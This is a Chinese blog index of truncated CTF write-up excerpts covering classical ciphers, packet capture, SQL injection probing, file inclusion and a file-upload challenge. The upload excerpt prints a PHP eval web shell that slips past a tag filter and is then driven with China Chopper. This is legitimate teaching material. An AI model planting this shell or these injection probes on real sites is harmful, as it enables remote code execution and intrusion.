CTF
关注
分享
扫一扫
优呦嘿
看我变小小佬,哈哈
展开
-
看起来有点简单
打开链接,会看到这样一个页面只有一个简单的网格,没有其他东西,查看源代码,也没有发现什么有用的东西,于是就试一下在网址处进行注入。在网址后面加一个单引号出错,加一句 and 1=1 正常,加 and 1=2 出错。则存在注入...原创 2018-07-16 15:39:57 · 164 阅读 · 0 评论 -
猫抓老鼠详解
该题主要用到的工具是burpSuite; 从题目中catch,catch,catch,中看出主要是抓包,打开链接,输入123,的结果为 然后看一下源代码 并没有发现什么,这时候想一下抓包;设置代理,用burpSuit抓包,可以看到 光从抓包信息中并没有发现什么答案,我们可以试着分析下http请求消息和响应消息从响应消息中可以看出大部分消息头很常见,但Content-Row:却很少见,试想一下密码会...原创 2018-07-04 20:12:27 · 848 阅读 · 0 评论 -
困在栅栏里的凯撒
看到题目时,并没有什么解题链接,只出现一串 NlEyQd{seft} 这样的字符,那我们就要开始去分析这串字符,从题目中找出答案,困在栅栏中的凯撒,则一开始就想到栅栏解密,栅栏解密后再用凯撒解密得出答案,由于凯撒密码解后,有26种可能,需要从中找出可能的答案;下面就详细去了解下什么是栅栏密码,如何去加密,解密。栅栏密码所谓栅栏密码,就是把要加密的明文分成N个一组,然后把每组的第1个字连起来,形成...原创 2018-07-15 10:35:08 · 1536 阅读 · 0 评论 -
貌似有点难
打开链接发现上面出现了,你的ip不在允许列表之内,那该怎么办,打开代码:<?phpfunction GetIP(){if(!empty($_SERVER["HTTP_CLIENT_IP"])) $cip = $_SERVER["HTTP_CLIENT_IP"];else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) $...原创 2018-08-05 15:33:16 · 159 阅读 · 0 评论 -
疑惑的汉字
王夫 井工 夫口 由中人 井中 夫夫 由中大 从题目中看到这一串字符,一串中文,啥?这是啥?我们平时看到的密码都是英文或符号,那这个,,,做题在于积累,从查阅得这是一个当铺密码。什么是当铺密码?当铺密码就是一种将中文和数字进行转换的密码,算法:当前汉字有多少笔画出头,就转化为数字几; 王夫 井工 夫口 由中人 井中 夫夫 由中大 对应:67 84 7...原创 2018-08-09 20:00:12 · 1548 阅读 · 0 评论 -
i春秋 upload
打开题目链接:可以随意上传文件, 上传图片,txt文件,php文件等都能上传上去;试着上传一句话;当上传一句话木马时,上传成功后,原文件变成了如下:把<?和php过滤掉了,再上传另一个一句话; <script language="PHP"> @eval($_POST["code"]);</script>上传后连接菜刀; ...原创 2018-08-11 13:23:44 · 1808 阅读 · 0 评论 -
传统知识+古典密码
拿到这道题,发现咋出现了一串关于年份的东西,这又是什么密码,由于上次做题出现一串汉字于是出来个当铺密码,所以这次看到还以为像上次一样出现一个没听说过的密码名称,于是放进百度,搜一下,没出现什么密码名称,于是想起它的顺序表 将题目中的内容一一对应,得出一数字字符:28 30 23 8 17 10 16 30,但题目中还提到 “信的背面还写有“+甲子”,”,然后各加六十(一甲子代表60年...原创 2018-08-11 19:59:48 · 2122 阅读 · 0 评论 -
i 春秋 web 题 <include>
打开链接地址:http://454e308408314446b0961f6226b502e7ad8cd9afd5614658.game.ichunqiu.com/题题目中以给出提示,这是文件包含题,打开题目链接后出现:代码中包含一个phpinfo.php文件,试着去打开这个文件,什么也没有发现。而且可以发现改代码是没有防护的文件包含。既然是关于php的,可以使用php协议在该链接下...原创 2018-08-22 19:30:11 · 2055 阅读 · 0 评论